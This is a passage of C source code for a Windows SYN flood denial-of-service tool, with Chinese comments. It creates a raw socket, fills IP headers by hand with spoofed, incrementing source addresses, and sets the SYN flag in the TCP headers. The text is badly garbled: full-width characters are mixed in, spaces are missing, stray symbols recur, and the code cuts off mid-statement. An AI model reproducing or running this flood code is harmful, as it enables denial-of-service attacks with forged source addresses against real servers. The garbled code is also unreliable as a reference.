//1６位窗口大小

ﻫ

ＵSHORTｔh＿sｕｍ;

//１6位校验和

ﻫ

ＵＳHOＲＴth＿ｕｒp;

//１6位紧急数据偏移量ﻫﻫ｝TＣP_HEADＥＲ;ﻫﻫ

ﻫﻫ／/CheckSuｍ:计算校验和的子函数ﻫﻫＵSＨORTchｅcｋsuｍ（USHORT*bｕｆｆer，ｉｎｔsiｚｅ)

ﻫ｛

ﻫﻫuｎsignｅｄｌｏｎgｃkｓｕｍ=０;ﻫ

whiｌｅ(siｚe〉１）｛ﻫ

cksum＋=＊ｂuffer＋+;

ﻫ

ｓｉｚe—=sizｅof（UＳHORT）;ﻫﻫ

｝ﻫ

ｉf(size）｛

cｋsum+＝＊（UＣHＡR＊）bｕffer；ﻫﻫ

}

cｋsuｍ=（cksｕm>>16)＋(cｋｓｕｍ&0xffff）；

ﻫ

ｃkｓuｍ+=（cksum>＞16）;ﻫﻫ

ｒｅturｎ（USHOＲＴ)(～cｋｓum）;

ﻫ｝ﻫﻫ

ﻫ//

SynFｌｏod主函数

ﻫｉnｔmａin（）ﻫﻫ｛ﻫﻫ

ｉntdatａsizｅ,ErroｒCode，cｏuntｅr，ｆlaｇ，FａｋｅIｐNｅt，ＦaｋeIｐＨｏｓt；ﻫ

intTｉmeOut＝2０0０，SendSEＱ=0;ﻫﻫ

ｃｈarＳendBuｆ［128］=｛0}；ﻫﻫ

ｃｈarＲecvBuf[65５3５]=｛０｝；

WＳＡDATＡwsａＤatａ;ﻫﻫ

ＳOCＫETＳockRaｗ＝（ＳOCＫET）NＵＬL;

ﻫ

stｒuｃtsｏcｋadｄr_inDeｓtAddr；

ﻫ

ＩＰ_HEAＤERｉp_ｈeadｅr；

ﻫ

TCP_HEADＥＲtcp_header；

ﻫ

//初始化ＳOCK_RＡWﻫﻫ

if（（ErrｏrＣｏｄe=WＳAＳtartup（MAKＥWORＤ(２,1)，&wsaDaｔa）)！=0）｛

ｆprｉｎｔｆ(stdeｒr，"WSASｔarｔｕｐfaｉlｅd:%ｄ\ｎ”，ErｒoｒCode）；ﻫ

ＥxiｔProcess（STAＴUS＿FAILED）；ﻫﻫ

｝ﻫ

SｏckＲaw＝WSASoｃket（AＦ＿IＮET,ＳOＣK_RＡW，IＰPＲOＴO_RＡW，ＮULL，0，WSA_FＬAG＿OVERLAPＰEＤ)）;ﻫﻫｉf(SｏｃkＲaw==INVＡLＩD_SOＣKET）｛ﻫﻫ

fpriｎｔf（ｓtderr,＂WSASockeｔ（)faileｄ：%d\n＂，ＷＳAＧetＬastＥｒror(））;ﻫﻫ

ＥxitProcess(SＴATＵS_FAＩLＥD);ﻫﻫ

}ﻫﻫ

flag=TＲＵE；

／/设置ＩP_HDRIＮＣＬ以自己填充IＰ首部ﻫﻫ

EｒｒｏrＣodｅ＝setsｏckｏｐt(ＳockＲaw，IPPRＯＴＯ_IP,ＩＰ＿ＨDＲIＮCL，（cｈar*）＆ｆlag，sｉｚｅof（int)）；

ﻫＩｆ（EｒrｏrＣｏｄe==SＯCＫET_ERROR）

printｆ("ＳetIＰ＿ＨDRIＮCLＥｒｒoｒ！＼ｎ＂）；ﻫﻫ

＿_try{ﻫ

//设置发送超时ﻫﻫ

ErｒorCｏｄｅ=setsockｏpt(SoｃkRaｗ,ＳOL_ＳOCＫET，SO_SＮDＴＩMＥO,(chａr*)&TimeＯut，sｉzeｏf（TimeＯuｔ)）；ﻫ

ｉf(ErｒoｒCodｅ==SOＣKET_ＥRRＯＲ）｛ﻫﻫ

fprintｆ(stderr，”ＦａｉledtoseｔsenｄTｉmeＯｕｔ:％d\n”,WSAGetLaｓtErｒｏr（））；

ﻫ

__leave；ﻫﻫ

｝ﻫﻫ

ｍemset(&DesｔAddr,0，sizｅof（DｅｓtＡddｒ）);ﻫ

ＤｅｓｔＡdｄｒ.siｎ_famiｌy＝AＦ_IＮＥT；

DestＡddr．ｓin_addr。ｓ＿adｄｒ=inet_ａddr（ＳYN＿ＤESＴ＿IＰ）；ﻫﻫ

FａkeIpＮet=ineｔ＿addr(FAＫE＿ＩＰ）；

FaｋｅIpＨoｓt＝ｎｔohl(ＦaｋｅＩｐＮｅt);ﻫﻫ

/／填充IＰ首部

ﻫ

ｉp_heaｄｅr。h_verｌen=(4<<4|sizeoｆ（iｐ＿headｅｒ）／sizeof（uｎｓigneｄlong））;ﻫﻫ//高四位IP版本号,低四位首部长度

ip_ｈeａdeｒ.total_len=htｏns（sｉｚｅof（IP＿HＥADEＲ）＋sizｅoｆ(TCP_HＥＡDEＲ))；

/／16位总长度(字节)ﻫﻫ

ip_header。idｅnt＝1；

／／１６位标识ﻫﻫ

ｉp_ｈeader.ｆrag_and_flags=0;

/／3位标志位ﻫﻫ

iｐ_ｈｅaｄer．ｔtl=128;

//8位生存时间TＴＬ

ﻫ

ｉp＿hｅａｄer.ｐｒoｔo=ＩPＰROＴO_ＴＣＰ；

／/8位协议（TＣＰ，UDＰ…)ﻫﻫ

iｐ_hｅader．checksum=0;

//1６位IP首部校验和

ﻫ

iｐ＿hｅaｄer．sourceIP=ｈｔoｎｌ（ＦaｋeIpＨｏst+SｅndSＥQ）；

//32位源IP地址ﻫ

ip_headｅｒ.deｓtIP=iｎｅｔ_addr(SＹN＿ＤESＴ_IＰ）;

／/３2位目的IP地址ﻫﻫ

／/填充ＴCＰ首部ﻫ

ｔcｐ_headｅr．th_sport＝hｔonｓ（70０0);

//源端口号ﻫﻫ

ｔcｐ_ｈeader。th＿ｄpｏrt＝ｈtonｓ(8０80);

//目的端口号

ｔcp_ｈｅaｄer．th＿ｓｅq＝htonｌ(SEQ＋SendSEＱ);

／／SYＮ序列号ﻫ

ｔcp＿heaｄeｒ．th_aｃk=０；

/／ACＫ序列号置为0

ﻫ

tｃp_hｅader．th＿lｅｎres=（sizeof（ＴＣＰ_HEＡＤER)/４＜〈4｜０）;

//ＴCＰ长度和保留位ﻫﻫ

tcp＿hｅaｄer．th_flａg＝2;

//SＹN标志ﻫﻫ

tcｐ_hｅader.ｔh_ｗin＝ｈtons(１6３８4)；

//窗口大小ﻫﻫ

ｔcp＿ｈｅader。th_urｐ＝0；

//偏移ﻫ

ｔｃp＿ｈeader．th_sum=０;

//校验和ﻫﻫ

//填充TCP伪首部（用于计算校验和,并不真正发送)ﻫﻫ

ｐｓd_hｅaｄeｒ.saddr＝iｐ＿heａder．sｏｕrceIP；

//源地址ﻫ

psd_ｈeａder.ｄａddr=iｐ＿header.dｅstIP;

/／目的地址ﻫﻫ

ｐｓd_header。mbz=0;

ﻫ

psｄ＿ｈeａdeｒ．ｐｔｃl=IＰＰROＴO_ＴCP;

／/协议类型ﻫ

pｓd_ｈｅaｄer.ｔｃpl=ｈtｏｎs(sizeof(tｃp＿head